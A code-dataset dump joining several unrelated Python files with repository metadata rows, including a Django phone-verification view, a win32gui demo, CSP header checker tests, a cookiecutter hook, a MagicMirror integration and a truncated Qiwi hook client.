context = super(MemberProfileView, self).get_context_data(**kwargs)
context['page_title'] = _('Profile')
pattern = re.compile(r'^[가-힣]+$') # Only Hangul
context['hangul_name'] = True \
if pattern.match(self.request.user.last_name) and pattern.match(self.request.user.first_name) else False
context['iamport_user_code'] = settings.IAMPORT['user_code']
context['iamport_sms_callback_url'] = self.request.build_absolute_uri(
reverse(settings.IAMPORT['sms_callback_url']))
return context
class MemberConfirmDocumentView(LoginRequiredMixin, HostContextMixin, StoreContextMixin, UpdateView):
template_name = 'member/account/document_confirm.html'
model = Profile
form_class = MemberDocumentForm
def get_object(self, queryset=None):
# NOTE: This method is overridden because DetailView must be called with either an object pk or a slug.
queryset = Profile.objects \
.select_related('user')
return get_object_or_404(queryset, user__pk=self.request.user.id)
def form_valid(self, form):
response = super(MemberConfirmDocumentView, self).form_valid(form)
'''
orders = Order.objects.valid(self.request.user).filter(status__in=[
Order.STATUS_CHOICES.payment_completed,
Order.STATUS_CHOICES.under_review,
Order.STATUS_CHOICES.payment_verified
])
if orders:
html_message = render_to_string('member/account/email/document_verified.html',
{'profile': self.object, 'orders': orders})
send_notification_email.delay(
_('[site] Customer Document Verification'),
'dummy',
settings.EMAIL_NO_REPLY,
[settings.EMAIL_CUSTOMER_SERVICE],
html_message,
)
'''
message = _('Document Verification {} {} {}') \
.format(self.object.full_name,
self.object.email,
self.request.build_absolute_uri(reverse('rabop:customer-detail', args=('default', self.object.id))))
send_notification_line.delay(message)
return response
def get_context_data(self, **kwargs):
context = super(MemberConfirmDocumentView, self).get_context_data(**kwargs)
context['page_title'] = _('Document Verification')
return context
def get_success_url(self):
return reverse('account_profile')
class MemberUnregisterView(AccessMixin, HostContextMixin, StoreContextMixin, FormView):
template_name = 'member/account/unregister.html'
form_class = MemberUnregisterForm
def dispatch(self, request, *args, **kwargs):
# LoginRequiredMixin is not used because of inheritance order
if not request.user.is_authenticated:
return self.handle_no_permission()
self.member = get_user_model().objects.get(pk=self.request.user.id)
return super(MemberUnregisterView, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super(MemberUnregisterView, self).get_context_data(**kwargs)
context['page_title'] = _('Unregister')
context['member'] = self.member
return context
def form_valid(self, form):
response = super(MemberUnregisterView, self).form_valid(form)
self.member.email = self.member.email + '_' + str(uuid.uuid4())
self.member.username = self.member.username + '_' + str(uuid.uuid4())
self.member.password = ''
self.member.is_active = False
self.member.is_staff = False
self.member.is_superuser = False
self.member.save()
EmailAddress.objects.filter(user__id=self.member.id).delete()
SocialAccount.objects.filter(user__id=self.member.id).delete()
logout(self.request)
return response
def get_success_url(self):
return reverse('shop:home', args=(self.store.code,))
class MemberNameUpdateView(LoginRequiredMixin, HostContextMixin, StoreContextMixin, UpdateView):
template_name = 'member/account/name_change.html'
model = Profile
form_class = MemberChangeNameForm
def get_object(self, queryset=None):
# NOTE: This method is overridden because DetailView must be called with either an object pk or a slug.
queryset = Profile.objects \
.select_related('user')
return get_object_or_404(queryset, user__pk=self.request.user.id)
def get_context_data(self, **kwargs):
context = super(MemberNameUpdateView, self).get_context_data(**kwargs)
context['page_title'] = _('Change Your Name')
return context
def form_valid(self, form):
form.instance.user.first_name = form.cleaned_data['first_name'].strip()
form.instance.user.last_name = form.cleaned_data['last_name'].strip()
form.instance.user.save()
form.instance.phone_verified_status = Profile.PHONE_VERIFIED_STATUS_CHOICES.unverified
form.instance.document_verified = False
return super(MemberNameUpdateView, self).form_valid(form)
def get_success_url(self):
return reverse('account_profile')
class IamportSmsCallbackView(StoreContextMixin, HostContextMixin, views.APIView):
logger = logging.getLogger(__name__)
sub_domain = 'card'
def get_access_token(self):
response = requests.post(
'{}/users/getToken'.format(settings.IAMPORT['api_url']),
data=json.dumps({
'imp_key': settings.IAMPORT['api_key'],
'imp_secret': settings.IAMPORT['secret'],
}),
headers={
'Content-Type': 'application/json',
'Cache-Control': 'no-cache',
})
if response.status_code == requests.codes.ok:
result = response.json()
if result['code'] == 0:
return result['response']['access_token']
return None
def find(self, imp_uid, token=None):
if not token:
token = self.get_access_token()
response = requests.get(
'{}certifications/{}'.format(settings.IAMPORT['api_url'], imp_uid),
headers={
"Authorization": token
})
if response.status_code == requests.codes.ok:
result = response.json()
if result['code'] == 0:
return result['response']
return None
def get(self, request, format=None):
return Response(None)
def post(self, request, format=None):
serializer = IamportSmsCallbackSerializer(data=request.data)
if serializer.is_valid():
response = self.find(request.data['imp_uid'])
if response and response['certified']:
print(request.data)
print(response)
try:
profile = Profile.objects.select_related('user').get(user__pk=int(request.data['merchant_uid']))
log = PhoneVerificationLog()
log.owner = profile.user
log.transaction_id = response['pg_tid']
log.di = response['unique_in_site']
log.ci = response['unique_key']
log.fullname = response['name']
log.date_of_birth = datetime.fromtimestamp(int(response['birth'])).strftime('%Y%m%d')
log.gender = 1 if response['gender'] == 'male' else 0
log.domestic = 1 if not response['foreigner'] else 0
log.telecom = response['carrier']
log.cellphone = response['phone']
log.save()
# check duplicate user verifications
logs = PhoneVerificationLog.objects \
.filter(ci=log.ci,
owner__isnull=False,
created__gte=make_aware(localtime().now() - timedelta(hours=48))) \
.exclude(owner=log.owner)
banned = PhoneBanned.objects.filter(phone=log.cellphone).exists()
if not logs:
# 1. 50세 이상 여자 90일
if now().date() - datetime.strptime(log.date_of_birth, '%Y%m%d').date() \
> timedelta(days=365 * 50) \
and log.gender == 0 \
and now() - profile.user.date_joined < timedelta(days=90):
return Response(data=json.dumps({
'code': 400,
'message': str(
_(
'Person aged over 50 can verify your account during 90 days after joined.'))
}),
status=status.HTTP_400_BAD_REQUEST)
# 2. 60세 이상 15일
if now().date() - datetime.strptime(log.date_of_birth, '%Y%m%d').date() \
> timedelta(days=365 * 60) \
and now() - profile.user.date_joined < timedelta(days=15):
return Response(data=json.dumps({
'code': 400,
'message': str(
_('Person aged over 60 can verify your account during 15 days after joined.'))
}),
status=status.HTTP_400_BAD_REQUEST)
# 3. 50세 이상 남자 72시간
if now().date() - datetime.strptime(log.date_of_birth, '%Y%m%d').date() \
> timedelta(days=365 * 50) \
and log.gender == 1 \
and now() - profile.user.date_joined < timedelta(hours=72):
return Response(data=json.dumps({
'code': 400,
'message': str(
_('Person aged over 50 can verify your account during 72 hours after joined.'))
}),
status=status.HTTP_400_BAD_REQUEST)
# 4. 45세 이상 여자 72시간
if now().date() - datetime.strptime(log.date_of_birth, '%Y%m%d').date() \
> timedelta(days=365 * 45) \
and log.gender == 0 \
and now() - profile.user.date_joined < timedelta(hours=72):
return Response(data=json.dumps({
'code': 400,
'message': str(
_(
'Person aged over 45 can verify your account during 72 hours after joined.'))
}),
status=status.HTTP_400_BAD_REQUEST)
# 5. 여자 알뜰폰 72시간
if 'MVNO' in log.telecom and log.gender == 0 \
and now() - profile.user.date_joined < timedelta(hours=72):
return Response(data=json.dumps({
'code': 400,
'message': str(
_('MVNO user can verify your account during 72 hours after joined.'))
}),
status=status.HTTP_400_BAD_REQUEST)
# 6. 45세 이상 남자 알뜰폰 48시간
if 'MVNO' in log.telecom and log.gender == 1 \
and now().date() - datetime.strptime(log.date_of_birth, '%Y%m%d').date() \
> timedelta(days=365 * 45) \
and now() - profile.user.date_joined < timedelta(hours=48):
return Response(data=json.dumps({
'code': 400,
'message': str(
_('MVNO user can verify your account during 48 hours after joined.'))
}),
status=status.HTTP_400_BAD_REQUEST)
# 7. 40세 이상 알뜰폰 24시간
if 'MVNO' in log.telecom \
and now().date() - datetime.strptime(log.date_of_birth, '%Y%m%d').date() \
> timedelta(days=365 * 40) \
and now() - profile.user.date_joined < timedelta(hours=24):
return Response(data=json.dumps({
'code': 400,
'message': str(_('MVNO user can verify your account during 24 hours after joined.'))
}),
status=status.HTTP_400_BAD_REQUEST)
# 8. 알뜰폰 영업시간 8시간
if 'MVNO' in log.telecom \
and now() - profile.user.date_joined < timedelta(hours=8) \
and datetime.strptime('08:00', '%H:%M').time() < localtime().time() \
< datetime.strptime('19:00', '%H:%M').time():
return Response(data=json.dumps({
'code': 400,
'message': str(
_('MVNO user can verify your account during 8 hours after joined.'))
}),
status=status.HTTP_400_BAD_REQUEST)
# 9. 여자 영업시간 8시간
if log.gender == 0 \
and now() - profile.user.date_joined < timedelta(hours=8) \
and datetime.strptime('08:00', '%H:%M').time() < localtime().time() \
< datetime.strptime('19:00', '%H:%M').time():
return Response(data=json.dumps({
'code': 400,
'message': str(
_(
'You can verify your account during 8 hours after joined.'))
}),
status=status.HTTP_400_BAD_REQUEST)
if not banned:
profile.phone = log.cellphone
if log.fullname == profile.full_name:
profile.phone_verified_status = Profile.PHONE_VERIFIED_STATUS_CHOICES.verified
profile.date_of_birth = datetime.strptime(log.date_of_birth, '%Y%m%d').date()
profile.gender = log.gender
profile.domestic = log.domestic
profile.telecom = log.telecom
profile.save()
orders = Order.objects.valid(profile.user).filter(status__in=[
Order.STATUS_CHOICES.under_review,
])
if orders:
message = _('Phone Verification {}').format(profile.full_name)
send_notification_line.delay(message)
return Response(serializer.data, status=status.HTTP_200_OK)
else:
return Response(data=json.dumps({
'code': 400,
'message': str(_('Your name does not match the phone owner.'))
}),
status=status.HTTP_400_BAD_REQUEST)
else:
return Response(data=json.dumps({
'code': 400,
'message': str(_('Your phone number is banned.'))
}),
status=status.HTTP_400_BAD_REQUEST)
else:
return Response(data=json.dumps({
'code': 400,
'message': str(_('You have verified within 48 hours.'))
}),
status=status.HTTP_400_BAD_REQUEST)
except (Profile.DoesNotExist, PhoneVerificationLog.DoesNotExist):
return Response(data=json.dumps({
'code': 400,
'message': str(_('Illegal access: no record'))
}),
status=status.HTTP_400_BAD_REQUEST)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
| 20,900 | 4,681 | 552 |
6702ad0203698101aea2205d1430ecdc7231ca29 | 1,011 | py | Python | TestPython/win32_test.py | ppcrong/TestPython | 6a87d09e31ad662ce1dea707118d1e914dfeaba7 | [
"Apache-2.0"
] | null | null | null | TestPython/win32_test.py | ppcrong/TestPython | 6a87d09e31ad662ce1dea707118d1e914dfeaba7 | [
"Apache-2.0"
] | null | null | null | TestPython/win32_test.py | ppcrong/TestPython | 6a87d09e31ad662ce1dea707118d1e914dfeaba7 | [
"Apache-2.0"
] | null | null | null | """
ref: https://blog.csdn.net/chengqiuming/article/details/78601000
"""
import win32gui
from win32con import *
wc = win32gui.WNDCLASS()
wc.hbrBackground = COLOR_BTNFACE + 1
wc.hCursor = win32gui.LoadCursor(0, IDI_APPLICATION)
wc.lpszClassName = "Python no Windows"
wc.lpfnWndProc = WndProc
reg = win32gui.RegisterClass(wc)
hwnd = win32gui.CreateWindow(reg, 'Python', WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT,
CW_USEDEFAULT, 0, 0, 0, None)
win32gui.ShowWindow(hwnd, SW_SHOWNORMAL)
win32gui.UpdateWindow(hwnd)
win32gui.PumpMessages()
| 33.7 | 109 | 0.714144 | """
ref: https://blog.csdn.net/chengqiuming/article/details/78601000
"""
import win32gui
from win32con import *
def WndProc(hwnd, msg, wParam, lParam):
if msg == WM_PAINT:
hdc, ps = win32gui.BeginPaint(hwnd)
rect = win32gui.GetClientRect(hwnd)
win32gui.DrawText(hdc, 'GUI Python', len('GUI Python'), rect, DT_SINGLELINE | DT_CENTER | DT_VCENTER)
win32gui.EndPaint(hwnd, ps)
if msg == WM_DESTROY:
win32gui.PostQuitMessage(0)
return win32gui.DefWindowProc(hwnd, msg, wParam, lParam)
wc = win32gui.WNDCLASS()
wc.hbrBackground = COLOR_BTNFACE + 1
wc.hCursor = win32gui.LoadCursor(0, IDI_APPLICATION)
wc.lpszClassName = "Python no Windows"
wc.lpfnWndProc = WndProc
reg = win32gui.RegisterClass(wc)
hwnd = win32gui.CreateWindow(reg, 'Python', WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT,
CW_USEDEFAULT, 0, 0, 0, None)
win32gui.ShowWindow(hwnd, SW_SHOWNORMAL)
win32gui.UpdateWindow(hwnd)
win32gui.PumpMessages()
| 399 | 0 | 23 |
4033af3baa2cce496ab17f96798632a32ab16573 | 1,842 | py | Python | resources/code/train/Python/unix_completers.py | searene/PLDetector | a8052b1d2ba91bfcc3fd4a5252480cf511d8a210 | [
"MIT"
] | 1 | 2020-11-09T08:24:17.000Z | 2020-11-09T08:24:17.000Z | resources/code/train/Python/unix_completers.py | searene/PLDetector | a8052b1d2ba91bfcc3fd4a5252480cf511d8a210 | [
"MIT"
] | null | null | null | resources/code/train/Python/unix_completers.py | searene/PLDetector | a8052b1d2ba91bfcc3fd4a5252480cf511d8a210 | [
"MIT"
] | null | null | null | # This file is part of the Hotwire Shell project API.
# Copyright (C) 2007 Colin Walters <walters@verbum.org>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
# PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE X CONSORTIUM BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR
# THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import os,sys
from hotwire.completion import Completer, Completion
from hotwire.builtins.sys_builtin import SystemCompleters
from hotwire.externals.singletonmixin import Singleton
#SystemCompleters.getInstance()['rpm'] = rpm_completion | 43.857143 | 86 | 0.741585 | # This file is part of the Hotwire Shell project API.
# Copyright (C) 2007 Colin Walters <walters@verbum.org>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
# PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE X CONSORTIUM BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR
# THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import os,sys
from hotwire.completion import Completer, Completion
from hotwire.builtins.sys_builtin import SystemCompleters
from hotwire.externals.singletonmixin import Singleton
class RpmDbCompleter(Completer):
def __init__(self):
super(RpmDbCompleter, self).__init__()
self.__db = ['foo', 'bar-devel', 'crack-attack']
def completions(self, text, cwd):
for pkg in self.__db:
compl = self._match(pkg, text)
if compl: yield compl
def rpm_completion(context, args, i):
lastarg = args[i].text
if lastarg.startswith('-q'):
return RpmDbCompleter()
#SystemCompleters.getInstance()['rpm'] = rpm_completion | 329 | 11 | 107 |
7b4db5c13a68afc8004647b967a4e4ecd74c7f3b | 1,688 | py | Python | securityheaders/checkers/csp/test_deprecateddirective.py | th3cyb3rc0p/securityheaders | 941264be581dc01afe28f6416f2d7bed79aecfb3 | [
"Apache-2.0"
] | 151 | 2018-07-29T22:34:43.000Z | 2022-03-22T05:08:27.000Z | securityheaders/checkers/csp/test_deprecateddirective.py | th3cyb3rc0p/securityheaders | 941264be581dc01afe28f6416f2d7bed79aecfb3 | [
"Apache-2.0"
] | 5 | 2019-04-24T07:31:36.000Z | 2021-04-15T14:31:23.000Z | securityheaders/checkers/csp/test_deprecateddirective.py | th3cyb3rc0p/securityheaders | 941264be581dc01afe28f6416f2d7bed79aecfb3 | [
"Apache-2.0"
] | 42 | 2018-07-31T08:18:59.000Z | 2022-03-28T08:18:32.000Z | import unittest
from securityheaders.checkers.csp import CSPDeprecatedDirectiveChecker, CSPReportOnlyDeprecatedDirectiveChecker
if __name__ == '__main__':
unittest.main()
| 33.098039 | 116 | 0.659953 | import unittest
from securityheaders.checkers.csp import CSPDeprecatedDirectiveChecker, CSPReportOnlyDeprecatedDirectiveChecker
class DeprectedDirectiveTest(unittest.TestCase):
def setUp(self):
self.x = CSPDeprecatedDirectiveChecker()
self.y = CSPReportOnlyDeprecatedDirectiveChecker()
def test_checkNoCSP(self):
nox = dict()
nox['test'] = 'value'
self.assertEqual(self.x.check(nox), [])
def test_checkNone(self):
nonex = None
self.assertEqual(self.x.check(nonex), [])
def test_NonePolicy(self):
hasx = dict()
hasx['content-security-policy'] = None
self.assertEqual(self.x.check(hasx), [])
def test_DeprecatedReportUriCSP3(self):
hasx3 = dict()
hasx3['content-security-policy'] = "report-uri http://foo.bar/csp"
result = self.x.check(hasx3)
self.assertIsNotNone(result)
self.assertEqual(len(result), 1)
def test_RODeprecatedReportUriCSP3(self):
hasx3 = dict()
hasx3['content-security-policy-report-only'] = "report-uri http://foo.bar/csp"
result = self.y.check(hasx3)
self.assertIsNotNone(result)
self.assertEqual(len(result), 1)
def test_ValidCSP(self):
hasx2 = dict()
hasx2['content-security-policy'] = "default-src 'self'; script-src 'nonce-4AEemGb0xJptoIGFP3Nd'"
self.assertEqual(self.x.check(hasx2), [])
def test_ROValidCSP(self):
hasx2 = dict()
hasx2['content-security-policy-report-only'] = "default-src 'self'; script-src 'nonce-4AEemGb0xJptoIGFP3Nd'"
self.assertEqual(self.y.check(hasx2), [])
if __name__ == '__main__':
unittest.main()
| 1,241 | 27 | 242 |
cb3b77714fd32c8a065680423d9cd22edd9be990 | 1,483 | py | Python | monlan/datamanagement/SymbolDataManager.py | CameleoGrey/Monlan | 998baa99d375ac28de317c431a724bdbc36ba0ff | [
"Apache-2.0"
] | 3 | 2021-12-04T10:05:10.000Z | 2022-03-18T13:25:17.000Z | monlan/datamanagement/SymbolDataManager.py | CameleoGrey/Monlan | 998baa99d375ac28de317c431a724bdbc36ba0ff | [
"Apache-2.0"
] | null | null | null | monlan/datamanagement/SymbolDataManager.py | CameleoGrey/Monlan | 998baa99d375ac28de317c431a724bdbc36ba0ff | [
"Apache-2.0"
] | 1 | 2021-04-28T18:18:25.000Z | 2021-04-28T18:18:25.000Z |
import pandas as pd
from datetime import datetime
from dateutil import parser
| 35.309524 | 96 | 0.609575 |
import pandas as pd
from datetime import datetime
from dateutil import parser
class SymbolDataManager:
def __init__(self, rawDataDir=None):
if rawDataDir is None:
self.rawDataDir = "../data/raw/"
else:
self.rawDataDir = rawDataDir
pass
def getData(self, symbol, timeFrame, normalizeNames = False, normalizeDateTime = False):
readedData = pd.read_csv( self.rawDataDir + symbol + "_" + timeFrame + ".csv", sep="\t")
if normalizeNames: readedData = self.normalizeColumnNames(readedData)
if normalizeDateTime: readedData = self.normalizeDateTimeColumns(readedData)
return readedData
def normalizeColumnNames(self, df):
columns = df.columns.values
for i in range( len(columns) ):
columns[i] = columns[i].lower()
columns[i] = columns[i].replace("<", "")
columns[i] = columns[i].replace(">", "")
df.columns = columns
return df
def normalizeDateTimeColumns(self, df):
datetimeColumn = pd.to_datetime( df["date"] + " " + df["time"] )
del df["date"]
del df["time"]
df["datetime"] = datetimeColumn
columnsNames = list(df.columns.values)
for i in range( len(columnsNames) ):
tmp = columnsNames[i]
columnsNames[i] = columnsNames[len(columnsNames) - 1]
columnsNames[len(columnsNames) - 1] = tmp
df = df[columnsNames]
return df
| 1,270 | 3 | 130 |
ff4152be70b620fb20dbfd2a00e10d70abf195e2 | 2,133 | py | Python | hooks/post_gen_project.py | insspb/python3-boilerplate | 7d70cd8a7bbbe2805ae5f4cb538996a30b96c736 | [
"MIT"
] | 3 | 2020-04-22T04:09:18.000Z | 2021-12-20T08:44:44.000Z | hooks/post_gen_project.py | insspb/python3-boilerplate | 7d70cd8a7bbbe2805ae5f4cb538996a30b96c736 | [
"MIT"
] | 11 | 2019-08-31T08:37:40.000Z | 2019-08-31T11:25:29.000Z | hooks/post_gen_project.py | insspb/python3-boilerplate | 7d70cd8a7bbbe2805ae5f4cb538996a30b96c736 | [
"MIT"
] | 1 | 2020-11-24T11:18:50.000Z | 2020-11-24T11:18:50.000Z | #!/usr/bin/env python
import os
import shutil
PROJECT_DIRECTORY = os.path.realpath(os.path.curdir)
if __name__ == '__main__':
if '{{ cookiecutter.authors_format }}' == 'Markdown':
remove_file('AUTHORS.rst')
remove_file('docs/source/AUTHORS.rst')
elif '{{ cookiecutter.authors_format }}' == 'reStructuredText':
remove_file('AUTHORS.md')
remove_file('docs/source/AUTHORS.md')
else:
remove_file('AUTHORS.rst')
remove_file('docs/source/AUTHORS.rst')
remove_file('AUTHORS.md')
remove_file('docs/source/AUTHORS.md')
if '{{ cookiecutter.readme_format }}' == 'Markdown':
remove_file('README.rst')
remove_file('docs/source/README.rst')
elif '{{ cookiecutter.readme_format }}' == 'reStructuredText':
remove_file('README.md')
remove_file('docs/source/README.md')
if '{{ cookiecutter.changelog_format }}' == 'Markdown':
remove_file('CHANGELOG.rst')
remove_file('docs/source/CHANGELOG.rst')
elif '{{ cookiecutter.changelog_format }}' == 'reStructuredText':
remove_file('CHANGELOG.md')
remove_file('docs/source/CHANGELOG.md')
else:
remove_file('CHANGELOG.rst')
remove_file('docs/source/CHANGELOG.rst')
remove_file('CHANGELOG.md')
remove_file('docs/source/CHANGELOG.md')
if '{{ cookiecutter.license }}' == 'None':
remove_file('LICENSE')
remove_file('docs/source/license.rst')
if '{{ cookiecutter.use_sphinx_documentation }}' == 'no':
remove_directory('docs')
if '{{ cookiecutter.install_issues_templates }}' == 'no':
remove_directory('.github')
remove_directory('.gitlab')
elif '{{ cookiecutter.install_issues_templates }}' == 'Gitlab':
remove_directory('.github')
elif '{{ cookiecutter.install_issues_templates }}' == 'Github':
remove_directory('.gitlab')
| 33.857143 | 94 | 0.65354 | #!/usr/bin/env python
import os
import shutil
PROJECT_DIRECTORY = os.path.realpath(os.path.curdir)
def remove_file(filepath):
os.remove(os.path.join(PROJECT_DIRECTORY, filepath))
def remove_directory(dirpath):
shutil.rmtree(os.path.join(PROJECT_DIRECTORY, dirpath), ignore_errors=False, onerror=None)
if __name__ == '__main__':
if '{{ cookiecutter.authors_format }}' == 'Markdown':
remove_file('AUTHORS.rst')
remove_file('docs/source/AUTHORS.rst')
elif '{{ cookiecutter.authors_format }}' == 'reStructuredText':
remove_file('AUTHORS.md')
remove_file('docs/source/AUTHORS.md')
else:
remove_file('AUTHORS.rst')
remove_file('docs/source/AUTHORS.rst')
remove_file('AUTHORS.md')
remove_file('docs/source/AUTHORS.md')
if '{{ cookiecutter.readme_format }}' == 'Markdown':
remove_file('README.rst')
remove_file('docs/source/README.rst')
elif '{{ cookiecutter.readme_format }}' == 'reStructuredText':
remove_file('README.md')
remove_file('docs/source/README.md')
if '{{ cookiecutter.changelog_format }}' == 'Markdown':
remove_file('CHANGELOG.rst')
remove_file('docs/source/CHANGELOG.rst')
elif '{{ cookiecutter.changelog_format }}' == 'reStructuredText':
remove_file('CHANGELOG.md')
remove_file('docs/source/CHANGELOG.md')
else:
remove_file('CHANGELOG.rst')
remove_file('docs/source/CHANGELOG.rst')
remove_file('CHANGELOG.md')
remove_file('docs/source/CHANGELOG.md')
if '{{ cookiecutter.license }}' == 'None':
remove_file('LICENSE')
remove_file('docs/source/license.rst')
if '{{ cookiecutter.use_sphinx_documentation }}' == 'no':
remove_directory('docs')
if '{{ cookiecutter.install_issues_templates }}' == 'no':
remove_directory('.github')
remove_directory('.gitlab')
elif '{{ cookiecutter.install_issues_templates }}' == 'Gitlab':
remove_directory('.github')
elif '{{ cookiecutter.install_issues_templates }}' == 'Github':
remove_directory('.gitlab')
| 166 | 0 | 46 |
f86e8dde87c41ff53dc076cdae82faecd78c22b6 | 2,452 | py | Python | custom_components/magicmirror/coordinator.py | sindrebroch/ha-magicmirror-remote | 479d326065d834c695114359bb70b7627c14bf87 | [
"Apache-2.0"
] | 4 | 2021-10-31T00:43:38.000Z | 2022-02-27T19:54:12.000Z | custom_components/magicmirror/coordinator.py | sindrebroch/ha-magicmirror-remote | 479d326065d834c695114359bb70b7627c14bf87 | [
"Apache-2.0"
] | 5 | 2022-02-13T17:50:16.000Z | 2022-03-30T20:55:45.000Z | custom_components/magicmirror/coordinator.py | sindrebroch/ha-magicmirror | 479d326065d834c695114359bb70b7627c14bf87 | [
"Apache-2.0"
] | null | null | null | """The MagicMirror integration."""
from __future__ import annotations
from datetime import timedelta
from aiohttp.client_exceptions import ClientConnectorError
from async_timeout import timeout
from voluptuous.error import Error
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed
from .api import MagicMirrorApiClient
from .const import DOMAIN as MAGICMIRROR_DOMAIN, LOGGER
from .models import Entity, MonitorResponse, QueryResponse
class MagicMirrorDataUpdateCoordinator(DataUpdateCoordinator):
"""Class to manage fetching MagicMirror data."""
def __init__(
self,
hass: HomeAssistant,
api: MagicMirrorApiClient,
) -> None:
"""Initialize."""
self.api = api
self._attr_device_info = DeviceInfo(
name="MagicMirror",
model="MagicMirror",
manufacturer="MagicMirror",
identifiers={(MAGICMIRROR_DOMAIN, "MagicMirror")},
configuration_url=f"{api.base_url}/remote.html",
)
super().__init__(
hass,
LOGGER,
name=MAGICMIRROR_DOMAIN,
update_interval=timedelta(minutes=1),
)
async def _async_update_data(self) -> dict[str, str]:
"""Update data via library."""
try:
async with timeout(10):
monitor: MonitorResponse = await self.api.monitor_status()
update: QueryResponse = await self.api.update_available()
brightness: QueryResponse = await self.api.get_brightness()
if not monitor.success:
LOGGER.warning("Failed to fetch monitor-status for MagicMirror")
if not update.success:
LOGGER.warning("Failed to fetch update-status for MagicMirror")
if not brightness.success:
LOGGER.warning("Failed to fetch brightness for MagicMirror")
return {
Entity.MONITOR_STATUS.value: monitor.monitor,
Entity.UPDATE_AVAILABLE.value: bool(update.result),
Entity.BRIGHTNESS.value: int(brightness.result),
}
except (Error, ClientConnectorError) as error:
LOGGER.error("Update error %s", error)
raise UpdateFailed(error) from error
| 34.535211 | 88 | 0.641109 | """The MagicMirror integration."""
from __future__ import annotations
from datetime import timedelta
from aiohttp.client_exceptions import ClientConnectorError
from async_timeout import timeout
from voluptuous.error import Error
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed
from .api import MagicMirrorApiClient
from .const import DOMAIN as MAGICMIRROR_DOMAIN, LOGGER
from .models import Entity, MonitorResponse, QueryResponse
class MagicMirrorDataUpdateCoordinator(DataUpdateCoordinator):
"""Class to manage fetching MagicMirror data."""
def __init__(
self,
hass: HomeAssistant,
api: MagicMirrorApiClient,
) -> None:
"""Initialize."""
self.api = api
self._attr_device_info = DeviceInfo(
name="MagicMirror",
model="MagicMirror",
manufacturer="MagicMirror",
identifiers={(MAGICMIRROR_DOMAIN, "MagicMirror")},
configuration_url=f"{api.base_url}/remote.html",
)
super().__init__(
hass,
LOGGER,
name=MAGICMIRROR_DOMAIN,
update_interval=timedelta(minutes=1),
)
async def _async_update_data(self) -> dict[str, str]:
"""Update data via library."""
try:
async with timeout(10):
monitor: MonitorResponse = await self.api.monitor_status()
update: QueryResponse = await self.api.update_available()
brightness: QueryResponse = await self.api.get_brightness()
if not monitor.success:
LOGGER.warning("Failed to fetch monitor-status for MagicMirror")
if not update.success:
LOGGER.warning("Failed to fetch update-status for MagicMirror")
if not brightness.success:
LOGGER.warning("Failed to fetch brightness for MagicMirror")
return {
Entity.MONITOR_STATUS.value: monitor.monitor,
Entity.UPDATE_AVAILABLE.value: bool(update.result),
Entity.BRIGHTNESS.value: int(brightness.result),
}
except (Error, ClientConnectorError) as error:
LOGGER.error("Update error %s", error)
raise UpdateFailed(error) from error
| 0 | 0 | 0 |
799ae99b0615493922bf217db8bdbd66c9dff751 | 1,540 | py | Python | qittle/types/methods/hook.py | muffleo/qittle | 6658e11eae9e6d83bcf0e930803c2f41abd3f4a0 | [
"MIT"
] | 2 | 2020-09-15T19:48:13.000Z | 2020-09-16T10:26:17.000Z | qittle/types/methods/hook.py | cyanlabs-org/qittle | 6658e11eae9e6d83bcf0e930803c2f41abd3f4a0 | [
"MIT"
] | 2 | 2021-05-04T17:15:28.000Z | 2021-05-04T17:20:09.000Z | qittle/types/methods/hook.py | cyanlabs-org/qittle | 6658e11eae9e6d83bcf0e930803c2f41abd3f4a0 | [
"MIT"
] | null | null | null | from qittle.types.responses import hook
from .base import Base
| 27.017544 | 66 | 0.470779 | from qittle.types.responses import hook
from .base import Base
class HookCategory(Base):
async def register(
self,
param: str,
hook_type: int = 1,
txn_type: str = 2,
**kwargs
) -> hook.DescriptionModel:
params = self.get_set_params(locals())
return hook.DescriptionModel(
**await self.api.request(
"PUT", "payment-notifier/v1/hooks",
params
)
)
async def get(
self,
**kwargs,
) -> hook.DescriptionModel:
params = self.get_set_params(locals())
return hook.DescriptionModel(
**await self.api.request(
"GET", "payment-notifier/v1/hooks/active",
params
)
)
async def delete(
self,
hook_id: str,
**kwargs,
) -> hook.ResponseModel:
params = self.get_set_params(locals())
return hook.ResponseModel(
